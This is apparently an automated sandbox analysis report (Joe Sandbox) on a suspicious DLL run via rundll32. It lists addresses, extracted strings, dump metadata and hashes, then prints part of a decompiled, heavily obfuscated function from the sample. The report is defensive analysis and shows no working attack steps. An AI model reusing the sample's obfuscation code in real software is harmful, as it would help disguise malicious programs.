0x1000dd6d
0x1000dd74
0x1000dd7f
0x1000dd8a
0x1000dd9a
0x1000dda1
0x1000ddac
0x1000ddb7
0x1000ddc2
0x1000ddcd
0x1000ddd8
0x1000dde3
0x1000ddee
0x1000ddf9
0x1000de04
0x1000de0c
0x1000de17
0x1000de22
0x1000de2d
0x1000de34
0x1000de3c
0x1000de47
0x1000de52
0x1000de5d
0x1000de68
0x1000de70
0x1000de7d
0x1000de81
0x1000de89
0x1000de94
0x1000de9c
0x1000dea7
0x1000deb2
0x1000debd
0x1000dec8
0x1000ded3
0x1000dee0
0x1000deeb
0x1000def6
0x1000defe
0x1000df09
0x1000df11
0x1000df19
0x1000df27
0x1000df2c
0x1000df32
0x1000df3a
0x1000df45
0x1000df50
0x1000df62
0x1000df67
0x1000df70
0x1000df7b
0x1000df86
0x1000df8e
0x1000df99
0x1000dfa4
0x1000dfaf
0x1000dfba
0x1000dfc5
0x1000dfd0
0x1000dfdb
0x1000dfe6
0x1000dff1
0x1000dffc
0x1000e007
0x1000e00f
0x1000e01a
0x1000e025
0x1000e035
0x1000e038
0x1000e03b
0x1000e042
0x1000e04d
0x1000e063
0x1000e06a
0x1000e075
0x1000e07d
0x1000e085
0x1000e08a
0x1000e092
0x1000e09a
0x1000e0a2
0x1000e0a7
0x1000e0ac
0x1000e0b1
0x1000e0b9
0x1000e0c1
0x1000e0c6
0x1000e0cb
0x1000e0d3
0x1000e0db
0x1000e0e3
0x1000e0f3
0x1000e0fb
0x1000e0fe
0x1000e104
0x1000e10c
0x1000e117
0x1000e11f
0x1000e12a
0x1000e135
0x1000e13d
0x1000e148
0x1000e150
0x1000e15e
0x1000e163
0x1000e16e
0x1000e171
0x1000e175
0x1000e17d
0x1000e188
0x1000e193
0x1000e19e
0x1000e1a9
0x1000e1b4
0x1000e1bc
0x1000e1c4
0x1000e1cf
0x1000e1da
0x1000e1e5
0x1000e1f0
0x1000e1fb
0x1000e211
0x1000e218
0x1000e223
0x1000e22a
0x1000e235
0x1000e240
0x1000e24b
0x1000e256
0x1000e261
0x1000e274
0x1000e275
0x1000e27c
0x1000e284
0x1000e28f
0x1000e29a
0x1000e2ae
0x1000e2bd
0x1000e2c4
0x1000e2cf
0x1000e2da
0x1000e2e2
0x1000e2ed
0x1000e2f8
0x1000e303
0x1000e30e
0x1000e319
0x1000e324
0x1000e32f
0x1000e337
0x1000e33f
0x1000e349
0x1000e34d
0x1000e355
0x1000e35d
0x1000e365
0x1000e369
0x1000e371
0x1000e379
0x1000e38f
0x1000e394
0x1000e39b
0x1000e3a6
0x1000e3b1
0x1000e3c1
0x1000e3c7
0x1000e3cf
0x1000e3d7
0x1000e3df
0x1000e3ea
0x1000e3f5
0x1000e400
0x1000e412
0x1000e417
0x1000e420
0x1000e42b
0x1000e43e
0x1000e441
0x1000e442
0x1000e449
0x1000e454
0x1000e45c
0x1000e467
0x1000e472
0x1000e47d
0x1000e488
0x1000e493
0x1000e49e
0x1000e4a9
0x1000e4b4
0x1000e4bf
0x1000e4c7
0x1000e4d2
0x1000e4dd
0x1000e4e8
0x1000e4f0
0x1000e4fb
0x1000e503
0x1000e50b
0x1000e510
0x1000e518
0x1000e520
0x1000e52b
0x1000e536
0x1000e541
0x1000e54c
0x1000e557
0x1000e562
0x1000e56d
0x1000e578
0x1000e58b
0x1000e592
0x1000e59d
0x1000e5b3
0x1000e5c2
0x1000e5c9
0x1000e5d4
0x1000e5e8
0x1000e5f1
0x1000e5fc
0x1000e604
0x1000e60f
0x1000e617
0x1000e61f
0x1000e627
0x1000e62f
0x1000e637
0x1000e64b
0x1000e650
0x1000e662
0x1000e669
0x1000e674
0x1000e688
0x1000e68d
0x1000e694
0x1000e69f
0x1000e6b4
0x1000e6b7
0x1000e6b8
0x1000e6bf
0x1000e6ca
0x1000e6d5
0x1000e6e0
0x1000e6eb
0x1000e701
0x1000e708
0x1000e713
0x1000e71b
0x1000e723
0x1000e730
0x1000e734
0x1000e73c
0x1000e747
0x1000e752
0x1000e762
0x1000e769
0x1000e774
0x1000e77f
0x1000e787
0x1000e792
0x1000e79d
0x1000e7a8
0x1000e7b3
0x1000e7be
0x1000e7c9
0x1000e7da
0x1000e7e1
0x1000e7ec
0x1000e7ff
0x1000e806
0x1000e811
0x1000e824
0x1000e82b
0x1000e838
0x1000e84c
0x1000e851
0x1000e85a
0x1000e861
0x1000e869
0x1000e874
0x1000e886
0x1000e88b
0x1000e894
0x1000e89f
0x1000e8aa
0x1000e8b5
0x1000e8c0
0x1000e8cb
0x1000e8d6
0x1000e8de
0x1000e8e6
0x1000e8f1
0x1000e904
0x1000e905
0x1000e914
0x1000e91b
0x1000e926
0x1000e931
0x1000e939
0x1000e941
0x1000e94c
0x1000e957
0x1000e95f
0x1000e96a
0x1000e975
0x1000e97d
0x1000e985
0x1000e98a
0x1000e992
0x1000e99a
0x1000e9a5
0x1000e9ad
0x1000e9b8
0x1000e9c0
0x1000e9c8
0x1000e9d2
0x1000e9d6
0x1000e9de
0x1000e9e9
0x1000e9f0
0x1000e9fb
0x1000ea06
0x1000ea0e
0x1000ea16
0x1000ea24
0x1000ea28
0x1000ea30
0x1000ea3b
0x1000ea4e
0x1000ea55
0x1000ea5d
0x1000ea68
0x1000ea73
0x1000ea7e
0x1000ea89
0x1000ea94
0x1000ea9f
0x1000eaaa
0x1000eab7
0x1000eabf
0x1000eace
0x1000ead1
0x1000ead5
0x1000eada
0x1000eae2
0x1000eaed
0x1000eaf5
0x1000eb07
0x1000eb0e
0x1000eb19
0x1000eb24
0x1000eb2f
0x1000eb3a
0x1000eb45
0x1000eb4c
0x1000eb57
0x1000eb62
0x1000eb6d
0x1000eb78
0x1000eb83
0x1000eb8b
0x1000eb90
0x1000eb98
0x1000eba0
0x1000eba8
0x1000ebb0
0x1000ebbd
0x1000ebbe
0x1000ebc2
0x1000ebca
0x1000ebd2
0x1000ebda
0x1000ebe2
0x1000ebea
0x1000ebf2
0x1000ebfa
0x1000ec05
0x1000ec10
0x1000ec1b
0x1000ec26
0x1000ec2e
0x1000ec33
0x1000ec41
0x1000ec45
0x1000ec4d
0x1000ec58
0x1000ec60
0x1000ec6b
0x1000ec76
0x1000ec7e
0x1000ec89
0x1000ec94
0x1000ec9f
0x1000ecaa
0x1000ecb5
0x1000ecc0
0x1000ecc8
0x1000ecd3
0x1000ecde
0x1000ece9
0x1000ecf4
0x1000ecff
0x1000ed0a
0x1000ed15
0x1000ed1d
0x1000ed28
0x1000ed30
0x1000ed3d
0x1000ed43
0x1000ed50
0x1000ed58
0x1000ed6c
0x1000ed78
0x1000ed7f
0x1000ed8a
0x1000ed95
0x1000eda0
0x1000eda8
0x1000edbd
0x1000edbe
0x1000edc5
0x1000edd0
0x1000edd8
0x1000ede0
0x1000ede8
0x1000edf0
0x1000edf8
0x1000ee15
0x1000ee1c
0x1000ee27
0x1000ee3a
0x1000ee41
0x1000ee4c
0x1000ee57
0x1000ee5f
0x1000ee6a
0x1000ee72
0x1000ee82
0x1000ee86
0x1000ee8e
0x1000ee96
0x1000eea1
0x1000eeac
0x1000eeb7
0x1000eec2
0x1000eecd
0x1000eed8
0x1000eee0
0x1000eeeb
0x1000eef3
0x1000eefb
0x1000ef00
0x1000ef05
0x1000ef0d
0x1000ef18
0x1000ef23
0x1000ef2b
0x1000ef36
0x1000ef41
0x1000ef49
0x1000ef51
0x1000ef5c
0x1000ef5c
0x1000ef5c
0x1000ef61
0x1000ef61
0x1000ef61
0x1000ef61
0x1000ef63
0x00000000
0x00000000
0x1000ef69
0x1000f34e
0x1000f361
0x1000f368
0x1000f370
0x1000ef5c
0x1000ef5c
0x1000ef5c
0x00000000
0x1000ef5c
0x1000ef5c
0x1000ef6f
0x1000ef75
0x1000f18e
0x1000f190
0x1000f27e
0x1000f284
0x1000f32c
0x1000f331
0x1000f333
0x1000f80b
0x1000f812
0x1000f812
0x1000f339
0x1000ef5c
0x1000ef5c
0x1000ef5c
0x00000000
0x1000ef5c
0x1000ef5c
0x1000f28a
0x1000f290
0x1000f30e
0x1000f314
0x1000ef5c
0x1000ef5c
0x1000ef5c
0x00000000
0x1000ef5c
0x1000ef5c
0x1000f292
0x1000f298
0x1000f2ea
0x1000f2ef
0x1000ef5c
0x1000ef5c
0x1000ef5c
0x00000000
0x1000ef5c
0x1000ef5c
0x1000f29a
0x1000f2a0
0x00000000
0x00000000
0x1000f2c3
0x1000f2cb
0x1000f2cc
0x1000f2d4
0x1000ef5c
0x1000ef5c
0x1000ef5c
0x00000000
0x1000ef5c
0x1000ef5c
0x1000f196
0x1000f7f1
0x00000000
0x1000f7f1
0x1000f19c
0x1000f1a2
0x1000f26c
0x1000f271
0x1000f274
0x1000f274
0x1000ef5c
0x1000ef5c
0x1000ef5c
0x00000000
0x1000ef5c
0x1000ef5c
0x1000f1a8
0x1000f1ae
0x1000f232
0x1000f239
0x1000f241
0x1000ef5c
0x1000ef5c
0x1000ef5c
0x00000000
0x1000ef5c
0x1000ef5c
0x1000f1b0
0x1000f1b6
0x1000f1fd
0x1000f202
0x1000f204
0x00000000
0x00000000
0x1000f215
0x1000f21a
0x1000ef5c
0x1000ef5c
0x1000ef5c
0x00000000
0x1000ef5c
0x1000ef5c
0x1000f1b8
0x1000f1be
0x00000000
0x00000000
0x1000f1e4
0x1000f1e9
0x1000f1ec
0x1000f1ec
0x1000ef5c
0x1000ef5c
0x1000ef5c
0x00000000
0x1000ef5c
0x1000ef5c
0x1000ef7b
0x1000f184
0x00000000
0x1000f184
0x1000ef81
0x1000ef87
0x1000f0f6
0x1000f0fc
0x1000f173
0x1000f17a
0x1000ef5c
0x1000ef5c
0x1000ef5c
0x00000000
0x1000ef5c
0x1000ef5c
0x1000f0fe
0x1000f104
0x1000f151
0x1000f156
0x1000ef5c
0x1000ef5c
0x1000ef5c
0x00000000
0x1000ef5c
0x1000ef5c
0x1000f106
0x1000f10c
0x1000f13e
0x1000f143
0x1000ef5c
0x1000ef5c
0x1000ef5c
0x00000000
0x1000ef5c
0x1000ef5c
0x1000f10e
0x1000f114
0x00000000
0x00000000
0x1000f126
0x1000f12d
0x1000ef5c
0x1000ef5c
0x1000ef5c
0x00000000
0x1000ef5c
0x1000ef5c
0x1000ef8d
0x1000f0ae
0x1000f0b3
0x1000f0b6
0x1000f0b8
0x1000f677
0x1000f677
0x1000ef5c
0x1000ef5c
0x1000ef5c
0x00000000
0x1000ef5c
0x1000ef5c
0x1000f0c9
0x1000f0ce
0x1000f0d6
0x1000f0db
0x1000ef5c
0x1000ef5c
0x1000ef5c
0x00000000
0x1000ef5c
0x1000ef5c
0x1000f0e1
0x1000f0e9
0x1000f0ee
0x00000000
0x1000f0ee
0x1000ef99
0x1000f073
0x1000f078
0x1000ef5c
0x1000ef5c
0x1000ef5c
0x00000000
0x1000ef5c
0x1000ef5c
0x1000efa5
0x1000f057
0x1000f05e
0x1000ef5c
0x1000ef5c
0x1000ef5c
0x00000000
0x1000ef5c
0x1000ef5c
0x1000efb1
0x1000f7e3
0x00000000
0x1000f7e3
0x1000efbd
0x1000f03d
0x1000f044
0x1000f046
0x1000efff
0x1000efff
0x1000ef5c
0x1000ef5c
0x1000ef5c
0x00000000
0x1000ef5c
0x1000ef5c
0x1000efc5
0x00000000
0x00000000
0x1000efe0
0x1000f015
0x1000f01c
0x1000f024
0x1000ef5c
0x1000ef5c
0x1000ef5c
0x00000000
0x1000ef5c
0x1000ef5c
0x1000eff0
0x1000eff7
0x1000eff9
0x00000000
0x1000eff9
0x1000f37b
0x1000f381
0x1000f5e9
0x1000f5ef
0x1000f6ae
0x1000f6b4
0x1000f7b5
0x1000f7ba
0x1000f7bd
0x1000f7c2
0x1000f7c2
0x00000000
0x1000f7c2
0x1000f6ba
0x1000f6c0
0x1000f72d
0x1000f73b
0x1000f758
0x1000f780
0x1000f785
0x1000f788
0x1000ef5c
0x1000ef5c
0x1000ef5c
0x00000000
0x1000ef5c
0x1000ef5c
0x1000f6c2
0x1000f6c4
0x1000f70d
0x1000f712
0x1000f715
0x1000ef5c
0x1000ef5c
0x1000ef5c
0x00000000
0x1000ef5c
0x1000ef5c
0x1000f6c6
0x1000f6cc
0x00000000
0x00000000
0x1000f6da
0x1000f6df
0x1000ef5c
0x1000ef5c
0x1000ef5c
0x00000000
0x1000ef5c
0x1000ef5c
0x1000f5f5
0x1000f69d
0x1000f6a2
0x1000ef5c
0x1000ef5c
0x1000ef5c
0x00000000
0x1000ef5c
0x1000ef5c
0x1000f5fb
0x1000f601
0x1000f688
0x1000f68a
0x1000ef5c
0x1000ef5c
0x1000ef5c
0x00000000
0x1000ef5c
0x1000ef5c
0x1000f603
0x1000f609
0x1000f667
0x1000f66d
0x1000f66f
0x1000f66f
0x00000000
0x1000f66f
0x1000f60b
0x1000f611
0x1000f643
0x1000f648
0x1000f64b
0x1000ef5c
0x1000ef5c
0x1000ef5c
0x00000000
0x1000ef5c
0x1000ef5c
0x1000f613
0x1000f619
0x00000000
0x00000000
0x1000f61f
0x00000000
0x1000f61f
0x1000f387
0x1000f5df
0x00000000
0x1000f5df
0x1000f38d
0x1000f393
0x1000f547
0x1000f54d
0x1000f806
0x00000000
0x1000f806
0x1000f553
0x1000f559
0x1000f5d0
0x1000f5d5
0x1000ef5c
0x1000ef5c
0x1000ef5c
0x00000000
0x1000ef5c
0x1000ef5c
0x1000f55b
0x1000f561
0x1000f5ac
0x1000f5b9
0x1000f5be
0x00000000
0x1000f5c1
0x1000f563
0x1000f569
0x00000000
0x00000000
0x1000f57d
0x1000f582
0x1000f584
0x00000000
0x00000000
0x1000f58a
0x1000ef5c
0x1000ef5c
0x1000ef5c
0x00000000
0x1000ef5c
0x1000ef5c
0x1000f399
0x1000f538
0x1000f53d
0x1000ef5c
0x1000ef5c
0x1000ef5c
0x00000000
0x1000ef5c
0x1000ef5c
0x1000f39f
0x1000f3a5
0x1000f51e
0x1000f523
0x1000ef5c
0x1000ef5c
0x1000ef5c
0x00000000
0x1000ef5c
0x1000ef5c
0x1000f3ab
0x1000f3b1
0x1000f45a
0x1000f465
0x1000f473
0x1000f47a
0x1000f482
0x1000f483
0x1000f488
0x1000f48b
0x1000f48d
0x1000f4d5
0x1000f4e1
0x1000f4f8
0x1000f508
0x1000f50d
0x1000f510
0x00000000
0x1000f510
0x1000f496
0x1000f4ad
0x1000f4ba
0x1000f4bf
0x1000f4c2
0x1000f4c4
0x1000ef5c
0x1000ef5c
0x1000ef5c
0x00000000
0x1000ef5c
0x1000ef5c
0x1000f3b7
0x1000f3bd
0x1000f419
0x1000f41e
0x1000f421
0x1000f423
0x1000f3ec
0x1000f3ec
0x1000ef5c
0x1000ef5c
0x1000ef5c
0x00000000
0x1000ef5c
0x1000ef5c
0x1000f43c
0x1000f449
0x1000f450
0x00000000
0x1000f450
0x1000f3bf
0x1000f3c5
0x00000000
0x00000000
0x1000f3df
0x1000f3e0
0x1000f3e1
0x1000f3e8
0x1000f3ea
0x1000f3f6
0x00000000
0x1000f3f6
0x00000000
0x1000f7c7
0x1000f7c7
0x1000f7c7
0x00000000
0x1000f7d3

Strings

b), xrefs: 1000E60F
_, xrefs: 1000E941
lK, xrefs: 1000ED95
{, xrefs: 1000DDF9
mU, xrefs: 1000E811
}o, xrefs: 1000E8F1
(1, xrefs: 1000E13D
ly, xrefs: 1000E01A
s4, xrefs: 1000DDA1
y?, xrefs: 1000E104
]1, xrefs: 1000E2E2
5h, xrefs: 1000EEEB
4, xrefs: 1000DC5F
;l, xrefs: 1000E3DF
6N, xrefs: 1000ED1D
v^, xrefs: 1000E9DE
, xrefs: 1000EA89
Ue., xrefs: 1000E806
T5, xrefs: 1000E520
2N, xrefs: 1000ED7F
g@, xrefs: 1000E669
#x, xrefs: 1000E303
@P, xrefs: 1000E708
N, xrefs: 1000E7BE
~|, xrefs: 1000E894
j:, xrefs: 1000EF0D
}L, xrefs: 1000DD0A
B, xrefs: 1000DF50
X, xrefs: 1000E29A
o, xrefs: 1000DE22
q2, xrefs: 1000EE5F
EA, xrefs: 1000DE9C
0G, xrefs: 1000EDF8
use Secure Password Authentication (SPA) to access your LDAP account, select the 'Log On Using Secure Password Authentication (SPA, xrefs: 1000EF9F, 1000F17A
Lw, xrefs: 1000E261

Memory Dump Source

Source File: 00000007.00000002.2098137627.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2098148687.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2098154346.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: $#x$(1$0G$2N$5h$6N$;l$@P$B$EA$Lw$N$T5$Ue.$X$]1$b)$g@$j:$lK$ly$mU$o$q2$s4$use Secure Password Authentication (SPA) to access your LDAP account, select the 'Log On Using Secure Password Authentication (SPA$v^$y?${$}L$}o$~|$4$_
API String ID: 0-1471606250
Opcode ID: abf9190a5ddaddb15da951abeef27d0c74c7bb0a7871e85bd9f0843ae82e2e6e
Instruction ID: 09289fdc9c065f3b08f6dc9904ee957473f24b9c187b49a6f0bb080dac621220
Opcode Fuzzy Hash: abf9190a5ddaddb15da951abeef27d0c74c7bb0a7871e85bd9f0843ae82e2e6e
Instruction Fuzzy Hash: DED202715093818BE3B8CF25C58ABDFBBE1FB84344F10891DE59A86260DBB59949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 1000ADCE, Relevance: 31.9, Strings: 25, Instructions: 696
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E1000ADCE(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr* _a24, intOrPtr _a28, intOrPtr _a32, signed int _a36, intOrPtr _a40) {
				intOrPtr* _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr* _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				unsigned int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				intOrPtr* _v340;
				intOrPtr* _v344;
				void* _t776;
				intOrPtr* _t779;
				intOrPtr* _t782;
				intOrPtr* _t794;
				intOrPtr _t799;
				intOrPtr _t800;
				void* _t806;
				void* _t808;
				intOrPtr _t810;
				intOrPtr* _t811;
				intOrPtr* _t815;
				signed int _t824;
				void* _t833;
				signed int _t834;
				void* _t876;
				intOrPtr _t879;
				signed int _t892;
				signed int _t893;
				signed int _t894;
				signed int _t895;
				signed int _t896;
				signed int _t897;
				signed int _t898;
				signed int _t899;
				signed int _t900;
				signed int _t901;
				signed int _t902;
				signed int _t903;
				signed int _t904;
				signed int _t905;
				signed int _t906;
				signed int _t907;
				signed int _t908;
				signed int _t909;
				signed int _t911;
				intOrPtr* _t917;
				void* _t919;
				void* _t921;
				void* _t923;

				_t815 = _a24;
				_push(_a40);
				_push(_a36 & 0x0000ffff);
				_push(_a32);
				_push(_a28);
				_push(_t815);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E100056B2(_a36 & 0x0000ffff);
				_v16 = 0x698fe5;
				_v4 = 0;
				_t817 = 0;
				_v20 = 0;
				_t917 = 0;
				_v12 = 0x6421c2;
				_t919 =  &_v344 + 0x30;
				_v8 = 0x4b39f;
				_v116 = 0xe145;
				_t911 = 0x2a775466;
				_v32 = 0;
				_t892 = 0x2c;
				_v344 = 0;
				_v116 = _v116 * 0x68;
				_v116 = _v116 ^ 0x005b8408;
				_v252 = 0x1a30;
				_v252 = _v252 | 0xfbfb3abf;
				_v252 = _v252 ^ 0xfbfb3aac;
				_v308 = 0xd892;
				_v308 = _v308 | 0x24cee9b5;
				_v308 = _v308 << 0xe;
				_v308 = _v308 ^ 0x3a963db2;
				_v308 = _v308 ^ 0x84fbfd7a;
				_v144 = 0xe41e;
				_v144 = _v144 ^ 0xfb5a10bc;
				_v144 = _v144 >> 2;
				_v144 = _v144 ^ 0x3ed63d28;
				_v292 = 0xf2f6;
				_v292 = _v292 + 0xffff8fc8;
				_v292 = _v292 / _t892;
				_v292 = _v292 + 0x4f67;
				_v292 = _v292 ^ 0x0000125f;
				_v44 = 0x5769;
				_v44 = _v44 + 0x7821;
				_v44 = _v44 ^ 0x0040cf8a;
				_v208 = 0xa2da;
				_v208 = _v208 + 0xffffda26;
				_v208 = _v208 | 0x6bc8fc84;
				_v208 = _v208 ^ 0x6bccfd84;
				_v100 = 0x8619;
				_t893 = 0x6e;
				_v100 = _v100 / _t893;
				_v100 = _v100 ^ 0x04000138;
				_v236 = 0x85ca;
				_v236 = _v236 + 0xf775;
				_v236 = _v236 >> 0xc;
				_v236 = _v236 | 0xc3010237;
				_v236 = _v236 ^ 0xc3090237;
				_v60 = 0x5f94;
				_v60 = _v60 + 0xffff918e;
				_v60 = _v60 ^ 0xfffff322;
				_v300 = 0xef4d;
				_v300 = _v300 | 0xf95e9216;
				_t894 = 0x1d;
				_v300 = _v300 * 0x78;
				_v300 = _v300 + 0xffffa6e4;
				_v300 = _v300 ^ 0xe4875a6c;
				_v176 = 0xcd87;
				_v176 = _v176 + 0xffff9544;
				_v176 = _v176 / _t894;
				_v176 = _v176 ^ 0x80000368;
				_v248 = 0xa869;
				_v248 = _v248 + 0xffff8a84;
				_v248 = _v248 | 0x3280cd8c;
				_t895 = 0x2c;
				_v248 = _v248 * 0x62;
				_v248 = _v248 ^ 0x5561f8ba;
				_v112 = 0xf823;
				_v112 = _v112 ^ 0xdc5ee9a3;
				_v112 = _v112 ^ 0xdc5e1183;
				_v284 = 0xd3bc;
				_v284 = _v284 + 0xffffd98b;
				_v284 = _v284 + 0x486f;
				_v284 = _v284 | 0x91fa5adb;
				_v284 = _v284 ^ 0x91fa81ff;
				_v220 = 0x23c4;
				_v220 = _v220 + 0x24bf;
				_v220 = _v220 >> 0xe;
				_v220 = _v220 ^ 0x0000397d;
				_v324 = 0x9c0e;
				_v324 = _v324 / _t895;
				_v324 = _v324 ^ 0x81dfe71b;
				_v324 = _v324 | 0x74c77561;
				_v324 = _v324 ^ 0xf5dfe4bc;
				_v244 = 0x9f78;
				_t896 = 0x30;
				_v244 = _v244 / _t896;
				_v244 = _v244 + 0xbc13;
				_v244 = _v244 + 0xffff658a;
				_v244 = _v244 ^ 0x00005446;
				_v276 = 0xb1b5;
				_v276 = _v276 >> 6;
				_t897 = 0x51;
				_v276 = _v276 * 0x2c;
				_v276 = _v276 ^ 0xbae7ac45;
				_v276 = _v276 ^ 0xbae7c01a;
				_v124 = 0x48e3;
				_v124 = _v124 / _t897;
				_v124 = _v124 ^ 0x0000464a;
				_v40 = 0xb973;
				_v40 = _v40 + 0x5be4;
				_v40 = _v40 ^ 0x0001169b;
				_v160 = 0x90d2;
				_v160 = _v160 ^ 0xc876beee;
				_v160 = _v160 ^ 0xab2ec0d4;
				_v160 = _v160 ^ 0x63589e4c;
				_v216 = 0xebb5;
				_v216 = _v216 + 0x1b6c;
				_v216 = _v216 + 0x5cd2;
				_v216 = _v216 ^ 0x000123a2;
				_v136 = 0xd2d;
				_v136 = _v136 ^ 0xde320a5a;
				_v136 = _v136 ^ 0xde322c98;
				_v316 = 0x9c31;
				_v316 = _v316 + 0x87ce;
				_v316 = _v316 >> 0xf;
				_v316 = _v316 << 0xf;
				_v316 = _v316 ^ 0x000161f3;
				_v68 = 0xaa4;
				_v68 = _v68 | 0x379a6afa;
				_v68 = _v68 ^ 0x379a4249;
				_v72 = 0x66fd;
				_v72 = _v72 ^ 0x1bf5aa39;
				_v72 = _v72 ^ 0x1bf5cfe8;
				_v240 = 0x10ca;
				_v240 = _v240 >> 2;
				_v240 = _v240 + 0x9cc9;
				_v240 = _v240 ^ 0x8ecb9aa9;
				_v240 = _v240 ^ 0x8ecb190c;
				_v80 = 0x1ce5;
				_v80 = _v80 + 0x5a3a;
				_v80 = _v80 ^ 0x000031ae;
				_v180 = 0x6dd0;
				_v180 = _v180 | 0x96bfe9d3;
				_v180 = _v180 + 0x5bad;
				_v180 = _v180 ^ 0x96c064a5;
				_v56 = 0x4ba5;
				_v56 = _v56 >> 9;
				_v56 = _v56 ^ 0x000020d5;
				_v164 = 0xc88c;
				_v164 = _v164 >> 0xf;
				_v164 = _v164 + 0xffffb953;
				_v164 = _v164 ^ 0xffffcdf3;
				_v172 = 0xd4f7;
				_v172 = _v172 + 0x6d56;
				_t898 = 0x71;
				_v172 = _v172 / _t898;
				_v172 = _v172 ^ 0x00007fec;
				_v64 = 0x2274;
				_v64 = _v64 << 5;
				_v64 = _v64 ^ 0x00042253;
				_v280 = 0xbd0e;
				_v280 = _v280 ^ 0x300005f5;
				_v280 = _v280 ^ 0x6939e5f4;
				_t899 = 0x4e;
				_v280 = _v280 * 0x37;
				_v280 = _v280 ^ 0x2b52c5dd;
				_v104 = 0xaf51;
				_v104 = _v104 << 7;
				_v104 = _v104 ^ 0x0057daf8;
				_v120 = 0x5a17;
				_v120 = _v120 << 7;
				_v120 = _v120 ^ 0x002d33fc;
				_v288 = 0x6e7b;
				_v288 = _v288 + 0xa186;
				_v288 = _v288 + 0xffffb015;
				_v288 = _v288 >> 2;
				_v288 = _v288 ^ 0x00005323;
				_v296 = 0x1ff6;
				_v296 = _v296 * 0x6d;
				_t900 = 0x76;
				_v296 = _v296 / _t899;
				_v296 = _v296 << 0xf;
				_v296 = _v296 ^ 0x1654878a;
				_v304 = 0x17a6;
				_v304 = _v304 >> 0xd;
				_v304 = _v304 >> 0x10;
				_v304 = _v304 ^ 0x39a777a9;
				_v304 = _v304 ^ 0x39a71383;
				_v312 = 0xc1c5;
				_v312 = _v312 << 4;
				_v312 = _v312 / _t900;
				_t901 = 0x24;
				_v312 = _v312 / _t901;
				_v312 = _v312 ^ 0x000020a2;
				_v128 = 0xa7c2;
				_v128 = _v128 | 0x73e84681;
				_v128 = _v128 ^ 0x73e882e0;
				_v108 = 0xedc0;
				_v108 = _v108 + 0xffff38f3;
				_v108 = _v108 ^ 0x00004e88;
				_v268 = 0x4cb2;
				_v268 = _v268 + 0xffff581a;
				_t902 = 5;
				_v268 = _v268 * 0x7f;
				_v268 = _v268 / _t902;
				_v268 = _v268 ^ 0x332a7d68;
				_v48 = 0x3775;
				_v48 = _v48 >> 7;
				_v48 = _v48 ^ 0x00003c2f;
				_v332 = 0x2e5;
				_v332 = _v332 + 0x973e;
				_v332 = _v332 + 0x582d;
				_v332 = _v332 | 0x4e46aea0;
				_v332 = _v332 ^ 0x4e46f01a;
				_v92 = 0xecb2;
				_v92 = _v92 >> 0x10;
				_v92 = _v92 ^ 0x00005860;
				_v192 = 0x76ab;
				_t903 = 0x58;
				_v192 = _v192 / _t903;
				_v192 = _v192 + 0xffffedde;
				_v192 = _v192 ^ 0xfffff039;
				_v168 = 0x569e;
				_v168 = _v168 | 0x8ce6da82;
				_v168 = _v168 ^ 0x7e552d9e;
				_v168 = _v168 ^ 0xf2b39afb;
				_v200 = 0x850f;
				_v200 = _v200 >> 2;
				_v200 = _v200 + 0xffffcd47;
				_v200 = _v200 ^ 0xfffff22a;
				_v336 = 0x9261;
				_v336 = _v336 << 0x10;
				_v336 = _v336 ^ 0x556f5d5a;
				_v336 = _v336 | 0x84e7afbb;
				_v336 = _v336 ^ 0xc7efb11f;
				_v260 = 0x9df0;
				_v260 = _v260 ^ 0x6037a460;
				_t904 = 0x6e;
				_v260 = _v260 / _t904;
				_t905 = 0x5d;
				_v260 = _v260 / _t905;
				_v260 = _v260 ^ 0x00026a3e;
				_v184 = 0x2584;
				_v184 = _v184 | 0x91f1cbbd;
				_v184 = _v184 + 0xffff1018;
				_v184 = _v184 ^ 0x91f0cf67;
				_v152 = 0x8ca9;
				_t906 = 0x4a;
				_v152 = _v152 / _t906;
				_v152 = _v152 << 4;
				_v152 = _v152 ^ 0x00006513;
				_v84 = 0x77f3;
				_v84 = _v84 + 0xffff3db1;
				_v84 = _v84 ^ 0xffffc1c9;
				_v52 = 0x587;
				_v52 = _v52 | 0x675f08fe;
				_v52 = _v52 ^ 0x675f36dd;
				_v76 = 0xbba2;
				_v76 = _v76 >> 3;
				_v76 = _v76 ^ 0x00005deb;
				_v328 = 0xf0a5;
				_v328 = _v328 | 0xb0da4f33;
				_v328 = _v328 >> 2;
				_v328 = _v328 + 0x1048;
				_v328 = _v328 ^ 0x2c36fa11;
